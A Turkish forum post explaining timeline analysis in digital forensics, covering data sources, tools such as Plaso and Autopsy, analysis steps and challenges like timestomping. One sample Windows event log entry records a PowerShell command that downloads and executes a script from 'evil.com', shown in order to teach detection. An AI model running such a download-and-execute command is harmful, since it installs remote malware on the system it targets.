Neler yeni

Yazılım Forum

Tüm özelliklerimize erişmek için şimdi bize katılın. Kayıt olduktan ve giriş yaptıktan sonra konu oluşturabilecek, mevcut konulara yanıt gönderebilecek, itibar kazanabilecek, özel mesajlaşmaya erişebilecek ve çok daha fazlasını yapabileceksiniz! Bu hizmetlerimiz ise tamamen ücretsiz ve kurallara uyulduğu sürece sınırsızdır, o zaman ne bekliyorsunuz? Hadi, sizde aramıza katılın!
Giriş yap Kayıt ol
Hazal Host Hazal Host

Sosyal Medyadan Bizi Takip Edin!

Adli Bilişimde Zaman Çizelgesi Analizinin Önemi ve Uygulama Yöntemleri

Adli Bilişimde Zaman Çizelgesi Adliyesi (Timeline Forensics) dijital adli bilişim alanında olayların kronolojik sıralamasını çıkarmak için kullanılan kritik bir yöntemdir. Bilgisayar sistemleri, ağ cihazları ve mobil aygıtlar üzerinde gerçekleşen faaliyetlerin zaman damgalı kayıtlarını analiz ederek, bir olayın nasıl geliştiğini, hangi dosyaların oluşturulduğunu, hangi programların çalıştırıldığını veya hangi ağ bağlantılarının kurulduğunu derinlemesine anlamamızı sağlar. Adli soruşturmaların temel taşlarından biri olan zaman çizelgesi analizi, bir olayın başlangıç noktasından sonuçlanışına kadar olan süreci net bir şekilde ortaya koyarak, deliller arasındaki bağlantıları kurmada ve şüpheli davranış kalıplarını belirlemede hayati bir rol oynar. Özellikle siber saldırılar, veri hırsızlığı, fikri mülkiyet ihlalleri veya şirket içi suiistimaller gibi durumlarda, zaman çizelgeleri olayın gidişatını aydınlatan bir yol haritası sunar.

Neden Zaman Çizelgesi Analizi Bu Kadar Önemli?
  • Olayın Kronolojik Akışını Belirleme: Bir olayın ne zaman başladığını, hangi aşamalardan geçtiğini ve ne zaman sona erdiğini adım adım ortaya koyar.
  • Deliller Arasındaki Bağlantıları Kurma: Farklı sistemlerden veya kaynaklardan elde edilen delillerin aynı olayın parçası olup olmadığını zaman damgaları aracılığıyla ilişkilendirir.
  • Niyet ve Motif Analizi: Şüpheli eylemlerin zamanlaması, bir saldırganın veya iç tehdidin niyetini ve hedeflerini anlamaya yardımcı olabilir.
  • Yanlış Pozitifleri Eleme ve Doğrulama: Diğer delillerin doğruluğunu teyit etmek veya şüpheli görünen ancak zaman çizelgesiyle uyumsuz olan kayıtları elemek için kullanılır.
  • Mahkemede Sunulabilir Kanıt Oluşturma: Oluşturulan zaman çizelgeleri, somut ve anlaşılır bir şekilde mahkemeye sunulabilir delil niteliği taşır.

Zaman Çizelgesi Oluşturma Süreci ve Temel Veri Kaynakları
Zaman çizelgesi oluşturma, birden fazla kaynaktan gelen zaman damgalı verilerin toplanması, normalleştirilmesi ve bir araya getirilmesini gerektiren çok aşamalı bir süreçtir. Bu süreç, kapsamlı bir dijital adli incelemenin ayrılmaz bir parçasıdır. Veri toplama aşamasında, mümkün olduğunca geniş bir yelpazede kaynaklardan bilgi toplanması kritik öneme sahiptir.
  • Dosya Sistemi Meta Verileri: En temel ve yaygın veri kaynaklarından biridir. Dosyaların oluşturulma (creation), erişilme (access), değiştirilme (modification) ve giriş değiştirilme (MACE veya MACB times) zaman damgaları, bir dosya veya klasör üzerinde ne zaman işlem yapıldığını gösterir. NTFS, FAT32, ext4 gibi dosya sistemlerinin her birinin kendine özgü zaman damgaları vardır ve bunlar analiz için çıkarılmalıdır.
  • Olay Kayıtları (Event Logs): Özellikle Windows sistemlerinde güvenlik, sistem, uygulama ve kurulum olay günlükleri (Event Viewer üzerinden erişilebilir) kullanıcı oturumları, sistem başlatma/kapatma, program çalıştırma, hata oluşumu gibi önemli olayları zaman damgası ile kaydeder. Linux sistemlerinde syslog veya auditd günlükleri benzer bilgiler sağlar.
  • Tarayıcı Geçmişi ve Çerezler: İnternet tarayıcıları (Chrome, Firefox, Edge vb.) ziyaret edilen web siteleri, indirilen dosyalar, arama sorguları ve oturum bilgileri hakkında zaman damgalı verileri depolar. Bu veriler, şüphelinin çevrimiçi faaliyetlerini ve araştırma geçmişini anlamak için paha biçilmezdir.
  • Sistem Kayıt Defteri (Registry) Değişiklikleri: Windows işletim sisteminde kayıt defteri, sistemin yapılandırması, yüklü programlar, kullanıcı tercihleri ve en son kullanılan belgeler gibi birçok bilgiyi barındırır. Kayıt defterindeki anahtarların ve değerlerin değiştirilme zaman damgaları, sistem üzerinde yapılan değişiklikleri anlamak için önemlidir. Örneğin, USB cihaz bağlantıları veya program çalıştırma izleri kayıt defterinde bulunabilir.
  • Uygulama Günlükleri: Birçok uygulama (e-posta istemcileri, anlık mesajlaşma programları, veritabanları vb.) kendi faaliyetlerini kaydetmek için günlük dosyaları oluşturur. Bu günlükler, uygulamanın ne zaman kullanıldığı, hangi verilerin işlendiği gibi kritik bilgiler içerir.
  • Ağ Bağlantı Kayıtları (NetFlow/IPFIX, Güvenlik Duvarı Kayıtları): Ağ cihazları ve güvenlik duvarları, ağdaki bağlantılar, veri transferleri ve trafik akışları hakkında zaman damgalı kayıtlar tutar. Bu kayıtlar, sistemlerin ne zaman dış dünyayla iletişim kurduğunu veya bir saldırının ne zaman gerçekleştiğini gösterir.
  • Bellek Dökümleri: Canlı sistemlerden alınan bellek dökümleri, çalışan süreçler, açık ağ bağlantıları, şifreler ve diğer uçucu veriler hakkında anlık bilgiler sunar. Bu veriler, diğer zaman damgalı kaynaklarla birleştirildiğinde olayın daha bütünsel bir resmini çizer.
  • Antivirüs/EDR Günlükleri: Güvenlik yazılımları, kötü amaçlı yazılım tespitleri, karantina olayları ve tarama aktiviteleri hakkında detaylı günlükler tutar. Bu günlükler, bir saldırının ne zaman fark edildiğini veya engellendiğini gösterir.

Zaman Çizelgesi Analizinde Kullanılan Araçlar
Zaman çizelgesi analizi için birçok ticari ve açık kaynaklı araç bulunmaktadır. Bu araçlar, farklı kaynaklardan gelen verileri ayrıştırmak, normalleştirmek ve görselleştirmek için geliştirilmiştir.
  • Plaso (log2timeline): En popüler açık kaynak araç setlerinden biridir. Çok çeşitli dosya türlerinden ve işletim sistemlerinden zaman damgalı verileri çıkarabilir ve bunları tek bir birleşik kronolojik çizelgeye dönüştürebilir. Plaso'nun çıktısı, timeline.csv veya diğer formatlarda görselleştirme için kullanılabilir. Kullanımı genellikle komut satırı tabanlıdır ve büyük veri kümelerini işleyebilir.
  • Autopsy/Sleuth Kit: Adli bilişimde yaygın olarak kullanılan açık kaynaklı bir platformdur. Dosya sistemi zaman damgalarını ve diğer artefaktları çıkararak zaman çizelgeleri oluşturma yeteneğine sahiptir. Sleuth Kit, disk görüntülerini analiz etmek için güçlü komut satırı araçları sunar.
  • EnCase/FTK (Forensic Toolkit): Ticari adli bilişim araçları arasında önde gelenlerdir. Kapsamlı özellik setleri arasında, dosya sistemi olaylarından, Windows kayıt defteri değişikliklerinden, olay günlüklerinden ve diğer birçok kaynaktan otomatik olarak zaman çizelgesi oluşturma yeteneği bulunur.
  • X-Ways Forensics: Hızlı ve güçlü bir ticari araçtır. Özellikle büyük veri setlerinin işlenmesinde ve zaman çizelgelerinin oluşturulmasında etkilidir.
  • Volatility Framework: Bellek adliyesi için kullanılan bir araçtır, ancak bellek dökümlerinden çıkarılan süreç çalıştırma zamanları, ağ bağlantıları gibi zaman damgalı verilerle zaman çizelgesine katkıda bulunabilir.

Zaman Çizelgesi Oluşturma ve Analiz Yöntemleri
Zaman çizelgesi oluşturma ve analiz süreci, karmaşık veri yığınlarını anlamlı bilgilere dönüştürmeyi amaçlar. Bu süreçte uygulanan adımlar, adli bilişim uzmanının olay hakkındaki sorularına cevap bulmasına yardımcı olur.
  • Veri Toplama ve Ön İşleme: İlk adım, ilgili sistemlerden (disk görüntüleri, bellek dökümleri, ağ trafik kayıtları vb.) delillerin adli olarak sağlam bir şekilde toplanmasıdır. Bu veriler daha sonra analiz araçlarının anlayabileceği formatlara dönüştürülür.
  • Ayrıştırma (Parsing): Her bir veri kaynağından (örn. NTFS dosya sistemi, Windows olay günlüğü, tarayıcı veritabanı) zaman damgalı olayların çıkarılması işlemidir. Her kaynağın kendine özgü bir yapısı olduğu için özel ayrıştırıcılar kullanılır.
  • Normalizasyon: Farklı kaynaklardan gelen zaman damgaları genellikle farklı formatlarda veya farklı zaman dilimlerinde (UTC, yerel zaman) olabilir. Bu adımda tüm zaman damgaları standart bir formata (genellikle UTC) dönüştürülür. Bu, olayların doğru bir şekilde kronolojik sıraya konulabilmesi için kritik öneme sahiptir.
  • Korelasyon ve Birleştirme: Normalleştirilmiş olaylar tek bir büyük zaman çizelgesinde bir araya getirilir. Bu "süper zaman çizelgesi" (super timeline), tüm olayları tek bir görünümde sunar. Örneğin, bir dosyanın oluşturulduğu zaman damgası ile aynı anda bir uygulamanın çalıştığı olay günlüğü kaydı ilişkilendirilebilir.
  • Filtreleme ve Arama: Oluşturulan devasa zaman çizelgesinde, belirli anahtar kelimeler, olay türleri, kullanıcılar veya belirli zaman aralıkları için filtreleme ve arama yapılır. Bu, ilgili olaylara odaklanmayı sağlar.
  • Görselleştirme: Ham zaman çizelgesi verisi genellikle çok büyüktür. Verilerin daha kolay anlaşılması için grafiksel arayüzler veya görselleştirme araçları kullanılır. Bu, olayların zaman içindeki dağılımını veya yoğunluğunu görsel olarak sunar.
  • Yorumlama ve Raporlama: Son adım, analiz edilen zaman çizelgesindeki olayları yorumlamak, olayın hikayesini yeniden inşa etmek ve bulguları anlaşılır bir rapor halinde sunmaktır. Bu rapor, hukuki süreçlerde kanıt olarak sunulur.

Zorluklar ve Dikkat Edilmesi Gerekenler
Zaman çizelgesi analizi, büyük faydalar sunmakla birlikte, bazı zorlukları da beraberinde getirir.
  • Zaman Dilimi Sorunları: Farklı sistemler veya uygulamalar farklı zaman dilimlerini kullanabilir. UTC (Evrensel Eşgüdümlü Zaman) ile yerel zaman arasındaki farklar, olayların doğru sıralanmasını zorlaştırabilir. Tüm zaman damgalarının standart bir zaman dilimine çevrilmesi hayati öneme sahiptir.
  • Sistem Saati Sapmaları: Bilgisayar sistemlerinin saatleri yanlış ayarlanmış olabilir veya uzun süre güncelleme almadığı için sapmalar gösterebilir. Bu durum, olayların gerçekte olduğundan farklı bir zamanda görünmesine neden olabilir.
  • Anti-Forensics Teknikleri: Saldırganlar veya kötü niyetli kullanıcılar, zaman damgalarını değiştirmek (timestomping) veya logları silmek gibi anti-forensics teknikleri kullanabilirler. Bu tür durumlar, zaman çizelgesinin bütünlüğünü bozabilir ve analiz sürecini karmaşıklaştırabilir. Uzmanlar, bu tür manipülasyonları tespit edebilmelidir.
  • Büyük Veri Hacimleri: Modern sistemler günde terabaytlarca veri üretebilir. Bu devasa veri kümelerini işlemek, analiz etmek ve anlamlı sonuçlar çıkarmak için güçlü donanım ve optimize edilmiş yazılımlar gereklidir.
  • Kapsamlı Bilgi Gereksinimi: Başarılı bir zaman çizelgesi analizi, sadece teknik araçların kullanımını değil, aynı zamanda işletim sistemleri, dosya sistemleri, ağ protokolleri ve çeşitli uygulama davranışları hakkında derinleşimli bilgi birikimini de gerektirir.

Örnek Uygulama Alanı: Komut Çalıştırma Tespiti
Bir siber güvenlik olayına müdahalede, bir saldırganın sistemde hangi komutları çalıştırdığını tespit etmek için zaman çizelgesi analizi kritik öneme sahiptir.
Kod: 
// Örnek bir olay günlüğü kaydı
Event ID: 4688
Source: Microsoft-Windows-Security-Auditing
Date/Time: 2023-10-26T14:35:12.345Z
Process Name: C:\Windows\System32\cmd.exe
New Process Name: C:\Windows\System32\powershell.exe
Command Line: "C:\Windows\System32\powershell.exe -NoP -Exec Bypass -C \"IEX (New-Object Net.WebClient).DownloadString('http://evil.com/malware.ps1');\""
Token Elevation Type: TokenElevationTypeLimited
Bu olay günlüğü kaydı, belirli bir zamanda bir PowerShell komutunun çalıştırıldığını gösterir. Zaman çizelgesine bu kaydı ekleyerek, saldırganın sistemi ne zaman ve nasıl etkilediği, hangi kötü amaçlı yazılımı indirmeye çalıştığı gibi bilgilere ulaşılabilir. Ardından, bu zaman damgası ile dosya sistemi değişiklikleri veya ağ bağlantıları gibi diğer zaman damgalı olaylar ilişkilendirilebilir. Örneğin, bu tür saldırıları tespit etme rehberleri bu yaklaşımı detaylandırır. Bir örnek senaryoda,
"Saldırganın hedef sisteme sızdıktan sonraki ilk adımı, persistans sağlamak amacıyla bir başlangıç öğesi eklemekti. Bu eylem, sistem olay günlüklerinde ve Registry kayıtlarındaki zaman damgalarıyla açıkça ilişkilendirildi."
Genişletmek için tıkla ...
gibi bir ifade, zaman çizelgesi analizinin nasıl bir hikaye anlattığını özetler.
Bir başka örnek olarak, bir fidye yazılımı saldırısını ele alalım. Zaman çizelgesi, kötü amaçlı yazılımın ilk olarak ne zaman sisteme girdiğini, hangi dosyaları şifrelemeye başladığını, fidye notunun ne zaman oluşturulduğunu ve iletişim kurulan komuta ve kontrol sunucularının zaman damgalarını bir araya getirebilir. Bu, olayın tam kapsamını ve yayılma hızını anlamak için vazgeçilmezdir.

Sonuç
Zaman çizelgesi adliyesi, dijital delillerin karmaşık dünyasında kronolojik bir düzen sağlamak ve olayların ardındaki hikayeyi ortaya çıkarmak için vazgeçilmez bir disiplindir. Doğru uygulandığında, adli bilişim uzmanlarına, siber suçluların izlerini takip etme, iç tehditleri açığa çıkarma ve bir olayın tüm zaman çizelgesini güvenilir bir şekilde yeniden oluşturma gücü verir. Bu, sadece teknik bir analiz değil, aynı zamanda olayın niyetini, etkisini ve sorumlularını belirlemede hayati bir rol oynayan stratejik bir bakış açısıdır. Gelecekte, veri hacimleri ve saldırı teknikleri arttıkça, zaman çizelgesi analizinin önemi daha da artacaktır. Bu nedenle, adli bilişim uzmanlarının bu alandaki bilgi ve becerilerini sürekli geliştirmeleri büyük önem taşımaktadır. Zaman çizelgesi, adli bir olayın kalbi gibidir; onunla, atan nabzı ve geçmişin seslerini duyabiliriz.
 
Genişletmek için tıkla ...
Cevap yazmak için giriş yap yada kayıt ol.

Sosyal Medyadan Bizi Takip Edin!

Hakkımızda

Yazılım hakkında en güncel bilgiler ve tartışmalar!

Online istatistikleri

Çevrim içi kullanıcılar
0
Çevrim içi ziyaretçiler
9
Toplam ziyaretçi
9
Toplamlar, gizli ziyaretçiler içerebilir.
shape1
shape2
shape3
shape4
shape5
shape6
Üst

Bu web sitenin performansı Hazal Host tarafından sağlanmaktadır.

YazilimForum.com.tr internet sitesi, 5651 sayılı Kanun’un 2. maddesinin 1. fıkrasının (m) bendi ve aynı Kanun’un 5. maddesi kapsamında Yer Sağlayıcı konumundadır. Sitede yer alan içerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır.

YazilimForum.com.tr, kullanıcılar tarafından paylaşılan içeriklerin doğruluğunu, güncelliğini veya hukuka uygunluğunu garanti etmez ve içeriklerin kontrolü veya araştırılması ile yükümlü değildir. Kullanıcılar, paylaştıkları içeriklerden tamamen kendileri sorumludur.

Hukuka aykırı içerikleri fark ettiğinizde lütfen bize bildirin: lydexcoding@gmail.com

Sitemiz, kullanıcıların paylaştığı içerik ve bilgileri 6698 sayılı KVKK kapsamında işlemektedir. Kullanıcılar, kişisel verileriyle ilgili haklarını KVKK Politikası sayfasından inceleyebilir.

Sitede yer alan reklamlar veya üçüncü taraf bağlantılar için YazilimForum.com.tr herhangi bir sorumluluk kabul etmez.

Sitemizi kullanarak Forum Kuralları’nı kabul etmiş sayılırsınız.

DMCA.com Protection Status Copyrighted.com Registered & Protected